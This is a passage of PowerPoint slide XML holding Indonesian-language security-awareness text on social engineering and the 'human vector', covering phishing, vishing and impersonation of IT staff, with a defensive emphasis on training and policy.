              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertipu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>phishing/vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penipu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IT, Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>impersonation attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626910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Manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manipulatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memimpin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Vektor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manusia</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>macam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Prasyarat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Orang-orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara-cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seseorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
